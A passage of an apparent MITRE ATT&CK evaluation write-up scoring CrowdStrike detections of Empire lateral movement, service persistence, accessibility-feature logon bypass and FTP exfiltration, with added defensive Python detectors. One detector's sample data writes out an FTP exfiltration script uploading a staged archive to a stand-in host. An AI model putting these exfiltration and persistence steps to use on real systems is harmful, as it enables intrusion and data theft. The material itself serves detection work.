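     "UserName": "Frieda", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
    # The success that follows the spray (the shape of step 16.B.1).
    {"ts": "2024-01-01T10:01:30", "SourceHost": "CodeRed", "TargetHost": "10.0.0.5",
     "UserName": "Kmitnick", "UserLogonFlags_decimal": 6, "UserLogonFailed": False},
    # A single failure from another host: an ordinary typo, not a spray.
    {"ts": "2024-01-01T09:15:00", "SourceHost": "Morris", "TargetHost": "10.0.1.6",
     "UserName": "Debbie", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
]


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["ts"])


def detect_password_spray(events: List[Dict],
                          window: timedelta = timedelta(minutes=5),
                          min_users: int = 3) -> List[Dict]:
    """One finding per source host that failed logons for >= min_users distinct
    accounts inside `window`; notes any success from that source right after."""
    failed: Dict[str, List[Dict]] = defaultdict(list)
    successes: Dict[str, List[Dict]] = defaultdict(list)
    for e in events:
        (failed if e["UserLogonFailed"] else successes)[e["SourceHost"]].append(e)

    findings = []
    for source, evs in failed.items():
        evs.sort(key=_ts)
        for i in range(len(evs)):
            start = _ts(evs[i])
            users, hosts, j = set(), set(), i
            # Slide forward while events stay inside the window.
            while j < len(evs) and _ts(evs[j]) - start <= window:
                users.add(evs[j]["UserName"])
                hosts.add(evs[j]["TargetHost"])
                j += 1
            if len(users) < min_users:
                continue
            last = _ts(evs[j - 1])
            later_success = sorted({s["UserName"] for s in successes.get(source, [])
                                    if last < _ts(s) <= last + window})
            findings.append({
                "source": source,
                "users": sorted(users),
                "hosts": sorted(hosts),
                "local_admin_attempts": sum(
                    1 for e in evs[i:j]
                    if e["UserLogonFlags_decimal"] == LOCAL_ADMIN_LOGON_FLAGS),
                "first": evs[i]["ts"],
                "last": evs[j - 1]["ts"],
                "followed_by_success": later_success,
            })
            break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_LOGONS):
        print(f)
```

Keying the window on the source host rather than on the target account is what separates a spray (few passwords, many accounts, often many hosts) from a single user mistyping a password, and the `followed_by_success` field is the cue to treat the surviving account as compromised rather than merely probed.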
Windows Admin Shares
(T1077)
Telemetry
  
Telemetry showed repeated logon attempts via net.exe with command-line arguments targeting ADMIN$ shares on the machines 10.0.1.4 (Morris) and 10.0.1.6 (Nimda).
General Behavior (Delayed, Tainted)
  
  
OverWatch generated General Behavior alerts indicating the net use commands attempting logon to ADMIN$ shares were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net use logon attempts to ADMIN$ shares
Process tree view of OverWatch General Behavior alerts indicating net.exe commands were suspicious (net.exe command details not specifically shown, tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally to access network resources (General Behavior)
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to connect to ADMIN$ on 10.0.0.5 (Conficker) as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a previous powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the successful net use connection to ADMIN$ was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing successful net use connection to ADMIN$ (tainted by previous powershell.exe detection by red line indicating high severity. The vendor noted the process tree view and severities change as detections occur.)
OverWatch General Behavior alert indicating successful net use connection to ADMIN$ was suspicious (would be tainted by previous powershell.exe detection by orange line indicating medium severity in process tree view that is not shown)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally to access network resources (General Behavior)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.  
Telemetry from process tree showing successful net.exe connection using valid credentials of Kmitnick (tainted by previous powershell.exe detection by red line indicating high severity. The vendor noted the process tree view and severities change as detections occur.)
OverWatch General Behavior alert indicating successful net use connection by Kmitnick was suspicious (would be tainted by previous powershell.exe detection by orange line indicating medium severity in process tree view that is not shown)
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments to connect as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing successful net.exe connection by Kmitnick (tainted by previous powershell.exe detection by red line indicating high severity. The vendor noted the process tree view and severities change as detections occur.)
OverWatch General Behavior alert indicating successful net use connection by Kmitnick was suspicious (would be tainted by previous powershell.exe detection by orange line indicating medium severity in process tree view that is not shown)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally (General Behavior)
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments. The telemetry was tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob removed an artifact for the ADMIN$ share. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe executing with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating they observed ADMIN$ artifact removed (General Behavior)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on 10.0.0.4 (Creeper) as the user Kmitnick. The telemetry was tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing process tree containing successful net use connection to C$ (tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally to access network resources (General Behavior)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on Creeper as the user Kmitnick. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
Telemetry showing successful net use connection by Kmitnick in the process tree view (tainted by previous powershell.exe detection by red line indicating high severity)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed File Write and New Script Write events for autoupdate.vbs under powershell.exe. The telemetry was tainted by a previous detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because a .vbs was written to the filesystem, which was likely used to carry out additional actions. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing File Write and New Script Write for autoupdate.vbs within powershell.exe (tainted by previous detection by orange line indicating medium severity)
Excerpt from email sent by OverWatch team indicating they observed autoupdate.vbs written (General Behavior)
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed a new cmd.exe process running wscript.exe as user Kmitnick, which then launched powershell.exe. The command-line arguments for cmd.exe showed that autoupdate.vbs was run. The telemetry was tainted by a previous detection.
Telemetry showing cmd.exe launching autoupdate.vbs as user Kmitnick (tainted by previous detection by red line indicating high severity)
Telemetry showing wscript.exe launching autoupdate.vbs as user Kmitnick (tainted by previous detection by red line indicating high severity)
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed update.vbs written to the C$ remote share on host 10.0.0.4 (Creeper).
Telemetry showing update.vbs with event_name NewScriptWritten indicating a write to C$
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed execution of sc.exe to query services on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because the user Bob was querying for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing sc.exe execution to query services on Creeper (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed Bob querying for a service on Creeper (Specific Behavior)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a General Behavior because a newly created file (the AdobeUpdater service in the registry) established persistence on the host. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing sc.exe execution to create the AdobeUpdater service (tainted from previous powershell.exe detection by red line indicating high severity)
Telemetry showing AdobeUpdater service details with binPath pointed to cmd.exe with arguments and service description
Email excerpt sent by OverWatch team indicating they observed a newly created file (AdobeUpdater service in registry) to establish persistence (General Behavior)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." An analyst could use this information to determine it is not a legitimate service. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree showing sc.exe execution with the AdobeUpdater service description (tainted from previous powershell.exe detection by red line indicating high severity)
Telemetry showing AdobeUpdater service details with binPath pointed to cmd.exe with arguments and service description
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments to query the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a Specific Behavior because the user Bob queried for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing sc.exe execution to query the AdobeUpdater service on Creeper process tree view (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed Bob querying for a service (Specific Behavior)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments to start the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a Specific Behavior because update.vbs executed following the start of the AdobeUpdater service. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing sc start in the process tree view (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed execution of update.vbs following the AdobeUpdater service start (Specific Behavior)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The process tree view showed reg.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree view showing reg.exe executing with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree view showing reg.exe executing with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed takeown.exe executing with command-line arguments. The process tree view showed takeown.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because takeown.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree view showing execution of takeown.exe (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed takeown.exe executed to bypass Windows logon (General Behavior)
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed execution of icacls.exe with command-line arguments. The process tree view showed icacls.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because icacls.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree view showing execution of icacls.exe (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed icacls.exe executed to bypass Windows logon (General Behavior)
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
  
 
Telemetry showed a file write of magnify.exe by powershell.exe in the system directory. The telemetry was tainted by an alert on its parent powershell.exe process.
Telemetry showing file write of magnify.exe by powershell.exe (tainted by parent powershell.exe high severity alert indicated by red icon)
Additional view of telemetry showing the magnify.exe file write
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry
  
Telemetry showed the .vsdx file being written into the Recycle Bin.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because the .vsdx file was copied to the Recycle Bin, a "likely location to stage files of interest." OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing the .vsdx being written into the Recycle Bin (event_SimpleName of OoxmlFileWritten)
Email excerpt sent by OverWatch team indicating they observed the .vsdx file being copied to Recycle Bin for staging (Specific Behavior)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure, though telemetry was available for the file write of the .vsdx into the Recycle Bin (no data was available indicating it came from a network shared drive).
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
  
Telemetry showed the SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR.
Telemetry showing SHA256 hash of recycler.exe
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed file write of recycler.exe by powershell.exe as well as the network connection over which the download occurred. The process tree view showed the parent powershell.exe process as tainted by a previous wscript.exe detection.
Telemetry showing file write of recycler.exe (parent powershell.exe tainted by previous wscript.exe detection by red line indicating high severity)
Telemetry showing network connection from 192.168.0.5 (C2 server) used by powershell.exe to transfer recycler.exe (parent powershell.exe tainted by previous wscript.exe detection by red line indicating high severity)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a RAR archive "written by a process with suspicious command line arguments." The alert showed the command-line details and was tagged with the correct ATT&CK Technique (Data Compressed) and Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection.
Telemetry
  
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a Specific Behavior because a .vsdx file was archived for likely exfiltration using the renamed RAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert on RAR archive written (mapped to correct ATT&CK Technique, Data Compressed, and Tactic, Exfiltration; tainted by previous powershell.exe detection by red line indicating high severity)
Additional details of recycler.exe from the alert showing it was signed by win.rar GmbH
Email excerpt sent by OverWatch team indicating they observed a .vsdx file archived using the renamed RAR binary, recycler.exe (Specific Behavior)
Data Encrypted
(T1022)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed the flags -hp within the command line that indicated use of encryption, and the alert was mapped to a related ATT&CK Technique (Data Compressed) and the correct Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection.
Telemetry
  
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing use of -hp flags within command-line (mapped to related ATT&CK Technique, Data Compressed, and correct Tactic, Exfiltration; tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed a .vsdx file archived using the renamed RAR binary, recycler.exe (Specific Behavior)
Masquerading
(T1036)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed that recycler.exe wrote a RAR archive and that recycler.exe was signed by win.rar GmbH. The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection.
Telemetry
  
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing recycler.exe was identified as WinRAR (tainted by previous powershell.exe detection by red line indicating high severity)
Additional alert details showing recycler.exe was signed by win.rar GmbH
Email excerpt sent by OverWatch team indicating they observed a .vsdx file archived using the renamed RAR binary, recycler.exe (Specific Behavior)
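Steps 19.A.1 and 19.B.1 together describe two analyst checks: the SHA256 hash and the win.rar GmbH signer identify recycler.exe as WinRAR despite its name, and the -hp switch in the command line shows the archive was encrypted. The block below is an added example that serves both rows; it is not code from the evaluation page or the vendor. The hash inventory holds a placeholder value rather than WinRAR's real hash, the event field names (ImageFileName, SHA256, Signer, CommandLine) are assumptions, and the sample event is constructed.

```python
"""Masquerading and encrypted-archive checks for step 19 telemetry (added example)."""
import os
from typing import Dict, Optional, Set

# Constructed inventory: SHA256 -> canonical tool. The hash is a placeholder;
# a defender would fill this from a known-binaries feed or the vendor installer.
KNOWN_BINARIES: Dict[str, str] = {
    "a1" * 32: "winrar",  # placeholder, NOT the real hash of any WinRAR binary
}
# Signer subject -> canonical tool (the page shows recycler.exe signed by win.rar GmbH).
SIGNER_TOOL: Dict[str, str] = {"win.rar gmbh": "winrar"}
# Image names under which each tool is expected to run.
EXPECTED_NAMES: Dict[str, Set[str]] = {"winrar": {"rar.exe", "winrar.exe", "unrar.exe"}}

# Constructed sample process event (field names are assumptions).
SAMPLE_PROCESS: Dict = {
    "ImageFileName": r"C:\Users\Bob\AppData\Local\Temp\recycler.exe",
    "SHA256": "a1" * 32,
    "Signer": "win.rar GmbH",
    "CommandLine": r'recycler.exe a -hpPLACEHOLDER old.rar "C:\$Recycle.Bin\Shockwave_network.vsdx"',
}


def identify_tool(sha256: str, signer: str) -> Optional[str]:
    """Hash match first (exact), signer second (weaker: any binary the vendor signed)."""
    tool = KNOWN_BINARIES.get(sha256.lower())
    if tool is None and signer:
        tool = SIGNER_TOOL.get(signer.lower())
    return tool


def check_masquerade(event: Dict) -> Optional[Dict]:
    """Return a finding when a recognised tool runs under an unexpected file name."""
    tool = identify_tool(event["SHA256"], event.get("Signer", ""))
    if tool is None:
        return None
    # Normalise Windows separators so basename works on any platform.
    name = os.path.basename(event["ImageFileName"].replace("\\", "/")).lower()
    if name in EXPECTED_NAMES.get(tool, set()):
        return None
    evidence = "hash" if event["SHA256"].lower() in KNOWN_BINARIES else "signer"
    return {"image": name, "identified_as": tool, "evidence": evidence}


def rar_encryption_mode(command_line: str) -> Optional[str]:
    """Read RAR switches: -hp encrypts headers and data, -p data only, -p- none."""
    for token in command_line.split()[1:]:
        t = token.lower()
        if t.startswith("-hp"):
            return "headers+data"
        if t.startswith("-p"):
            return None if t == "-p-" else "data"
    return None


def assess(event: Dict) -> Dict:
    """Combine both checks into one triage record for a process event."""
    return {"masquerade": check_masquerade(event),
            "encryption": rar_encryption_mode(event["CommandLine"])}


if __name__ == "__main__":
    print(assess(SAMPLE_PROCESS))
```

The hash check is the strong signal; the signer check is a fallback that also fires on any other binary the same vendor signed, which is why the finding records which evidence produced it. Reading the -hp switch out of the command line is what turns "archive written" into "encrypted archive written", the distinction between the Data Compressed and Data Encrypted rows above.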
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious. The process tree view showed ftp.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed ftp.exe executing with ftp.txt. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because collected files were exfiltrated via FTP. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious (tainted by a previous powershell.exe detection; the red line indicates high severity)
Email excerpt sent by OverWatch team indicating they observed the collected files being exfiltrated via FTP (Specific Behavior)
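The three signals the notes above rely on for steps 19.A.1 through 19.C.1 (a WinRAR binary signed by win.rar GmbH running under another name, ftp.exe driven by a script file, and both inheriting taint from an already-detected powershell.exe) can be expressed as rules over process telemetry. The following is an added example written for this page; it is not CrowdStrike Falcon or MITRE code. It assumes a flat list of process events carrying pid, ppid, image name, command line, signer and a per-process "already alerted" flag; the sample events, the pids, the ftp host (192.0.2.10, a documentation address) and the ftp.txt contents are all constructed. The only facts taken from the write-up are the behaviours themselves and the signer name.

```python
"""Lineage taint plus two behaviour rules over constructed endpoint telemetry.

Added example; not Falcon or MITRE code. Fields, sample events and the ftp
script are constructed to mirror steps 11.A.1 and 19.A.1 to 19.C.1 on CodeRed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str              # file name the process was launched under
    cmdline: str
    signer: str = ""        # Authenticode signer subject, if the file is signed
    detected: bool = False  # True if this process already raised an alert


WINRAR_IMAGES = {"winrar.exe", "rar.exe", "unrar.exe"}

# Constructed sample telemetry (pids, command lines and hosts are made up).
SAMPLE: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe", "Microsoft Windows"),
    ProcEvent(200, 100, "wscript.exe", "wscript.exe autoupdate.vbs", "Microsoft Windows"),
    ProcEvent(300, 200, "powershell.exe", "powershell.exe -NoP -NonI -W Hidden",
              "Microsoft Windows", detected=True),
    ProcEvent(400, 300, "recycler.exe",
              "recycler.exe a -hp old.rar Shockwave_network.vsdx", "win.rar GmbH"),
    ProcEvent(500, 300, "ftp.exe", "ftp.exe -s:ftp.txt", "Microsoft Windows"),
    # Interactive ftp use by the user, with no detected ancestor: must stay quiet.
    ProcEvent(600, 100, "ftp.exe", "ftp.exe 192.0.2.20", "Microsoft Windows"),
]

# Constructed ftp.txt, as a sequence of 'echo' commands would write it.
FTP_SCRIPT = (
    "open 192.0.2.10\n"
    "user exfil\n"
    "Secret1\n"
    "binary\n"
    "put C:\\$Recycle.Bin\\old.rar\n"
    "quit\n"
)


def lineage(index: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Process followed by its ancestors; stops when the chain leaves the index."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid].ppid
    return chain


def tainted_by(index: Dict[int, ProcEvent], pid: int) -> str:
    """Image name of the nearest detected ancestor, or '' if the lineage is clean."""
    for ancestor in lineage(index, pid)[1:]:
        if ancestor.detected:
            return ancestor.image
    return ""


def parse_ftp_script(text: str) -> Tuple[str, List[str]]:
    """Pull the target host and uploaded paths out of an 'ftp -s:' script."""
    host, uploads = "", []
    for line in text.splitlines():
        parts = line.strip().split(maxsplit=1)
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) == 2:
            host = parts[1]
        elif verb in ("put", "mput", "send") and len(parts) == 2:
            uploads.append(parts[1])
    return host, uploads


def evaluate(events: List[ProcEvent]) -> Dict[int, dict]:
    """Apply both rules; a hit under a detected ancestor is escalated to high."""
    index = {e.pid: e for e in events}
    findings: Dict[int, dict] = {}
    for e in events:
        rules = []
        img = e.image.lower()
        # Rule 1: WinRAR's signer under a file name that is not WinRAR (masquerading).
        if e.signer == "win.rar GmbH" and img not in WINRAR_IMAGES:
            rules.append("masquerading: WinRAR-signed binary running as " + e.image)
        # Rule 2: ftp.exe reading its commands from a script file (-s:).
        if img == "ftp.exe" and "-s:" in e.cmdline.lower():
            rules.append("exfil over alternative protocol: ftp.exe driven by script file")
        if not rules:
            continue
        source = tainted_by(index, e.pid)
        findings[e.pid] = {
            "image": e.image,
            "rules": rules,
            "tainted_by": source,
            "severity": "high" if source else "medium",
        }
    return findings
```

Run `evaluate(SAMPLE)` to get findings for pids 400 and 500 only, both marked as tainted by powershell.exe; the interactive ftp.exe (pid 600) produces nothing. `parse_ftp_script(FTP_SCRIPT)` recovers the destination host and the staged archive being uploaded, which is the detail an analyst wants before deciding the alert is exfiltration rather than a file transfer.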
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry
Telemetry showed the deletion of old.rar with an event name of FileDeleted.
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including old.rar) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing deletion of old.rar
Email excerpt sent by OverWatch team indicating they observed old.rar being deleted (Specific Behavior)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Telemetry
Telemetry showed the deletion of recycler.exe with an event name of ExecutableDeleted.
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including recycler.exe) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing deletion of recycler.exe
Email excerpt sent by OverWatch team indicating they observed recycler.exe being deleted (Specific Behavior)
20.A.1
magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Specific Behavior
A Specific Behavior alert was generated on utilman.exe executing magnify.exe, noting that "a process chain bypassed Windows logon security." The alert was marked critical and was mapped to the correct ATT&CK Technique (Accessibility Features) and Tactic (Persistence). Data in the alert also showed that magnify.exe was identified as cmd.exe based on hash value in the common name field.
Telemetry
Telemetry within the alert showed the details for magnify.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating a Windows logon bypass on Creeper was observed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing magnify.exe executing from utilman.exe (mapped to correct ATT&CK Technique, Accessibility Features, and Tactic, Persistence; pink indicates critical severity)
